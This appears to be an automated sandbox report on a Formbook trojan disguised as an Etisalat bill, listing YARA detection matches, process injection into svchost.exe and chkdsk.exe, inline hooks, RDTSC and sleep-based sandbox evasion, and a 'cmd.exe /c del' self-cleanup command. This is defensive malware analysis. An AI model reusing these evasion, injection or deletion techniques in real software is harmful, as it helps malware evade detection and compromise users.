Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Etisalat Summary Bill for the Month of August.exe PID: 6544, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 3128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/4@14/7

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_009137B5 GetLastError,FormatMessageW,

0_2_009137B5

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_009010BF AdjustTokenPrivileges,CloseHandle,		0_2_009010BF
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_009016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009016C3

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_009151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009151CD

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0092A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0092A67C

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0091648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0091648E

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008A42A2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_03

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

File created: C:\Users\user\AppData\Local\Temp\autE901.tmp

Jump to behavior

Source: Etisalat Summary Bill for the Month of August.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Etisalat Summary Bill for the Month of August.exe	ReversingLabs: Detection: 42%
Source: Etisalat Summary Bill for the Month of August.exe	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Etisalat Summary Bill for the Month of August.exe

Static file information: File size 1192448 > 1048576

Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Etisalat Summary Bill for the Month of August.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: svchost.exe, 00000002.00000002.2082896192.0000000003D80000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2082134723.000000000341B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486277348.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: svchost.exe, 00000002.00000002.2082896192.0000000003D80000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2082134723.000000000341B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486277348.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2021962175.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2022083360.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023933033.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2025699251.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.00000000058E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2082681074.0000000005573000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2084491990.000000000572B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.0000000005A7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2021962175.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2022083360.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2082563492.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023933033.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2025699251.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2082563492.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000002.4487046366.00000000058E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2082681074.0000000005573000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.2084491990.000000000572B000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487046366.0000000005A7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4498093805.0000000010E3F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486522930.0000000005258000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.0000000005E2F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4498093805.0000000010E3F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4486522930.0000000005258000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4487592639.0000000005E2F000.00000004.10000000.00040000.00000000.sdmp

Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Etisalat Summary Bill for the Month of August.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008A42DE

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C0A76 push ecx; ret	0_2_008C0A89
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008D7138 push esp; retf	0_2_008D7140
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008D7736 push esp; retf	0_2_008D7737
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417012 push ds; retf	2_2_00417016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004169BA push edi; ret	2_2_004169C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A5F push esp; ret	2_2_00416A65
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0225F pushad ; ret	2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A027FA pushad ; ret	2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx	2_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0283D push eax; iretd	2_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A01366 push eax; iretd	2_2_03A01369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6EB1E push esp; retn 0000h	2_2_03F6EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6EB02 push esp; retn 0000h	2_2_03F6EB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6E9B5 push esp; retn 0000h	2_2_03F6EAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5ABB1E push esp; retn 0000h	3_2_0E5ABB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5ABB02 push esp; retn 0000h	3_2_0E5ABB03
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5AB9B5 push esp; retn 0000h	3_2_0E5ABAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10A919B5 push esp; retn 0000h	3_2_10A91AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10A91B02 push esp; retn 0000h	3_2_10A91B03
Source: C:\Windows\explorer.exe	Code function: 3_2_10A91B1E push esp; retn 0000h	3_2_10A91B1F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058E27FA pushad ; ret	4_2_058E27F9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058E225F pushad ; ret	4_2_058E27F9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059109AD push ecx; mov dword ptr [esp], ecx	4_2_059109B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058E283D push eax; iretd	4_2_058E2858
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CD50B push eax; ret	4_2_050CD572
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CD502 push eax; ret	4_2_050CD508
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CD56C push eax; ret	4_2_050CD572

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	File created: \etisalat summary bill for the month of august.exe
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	File created: \etisalat summary bill for the month of august.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_008BF98E
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00931C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00931C41

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98276

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	API/Special instruction interceptor: Address: 1F43264
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 50B9904 second address: 50B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 50B9B7E second address: 50B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8080	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1860	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 878	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 2529	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 7443	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 2.2 %

Source: C:\Windows\explorer.exe TID: 6784	Thread sleep count: 8080 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6784	Thread sleep time: -16160000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6784	Thread sleep count: 1860 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6784	Thread sleep time: -3720000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6400	Thread sleep count: 2529 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6400	Thread sleep time: -5058000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6400	Thread sleep count: 7443 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6400	Thread sleep time: -14886000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0090DBBE
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008DC2A2 FindFirstFileExW,	0_2_008DC2A2
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_009168EE FindFirstFileW,FindClose,	0_2_009168EE
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0091698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0091698F
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0090D076
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0090D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0090D3A9
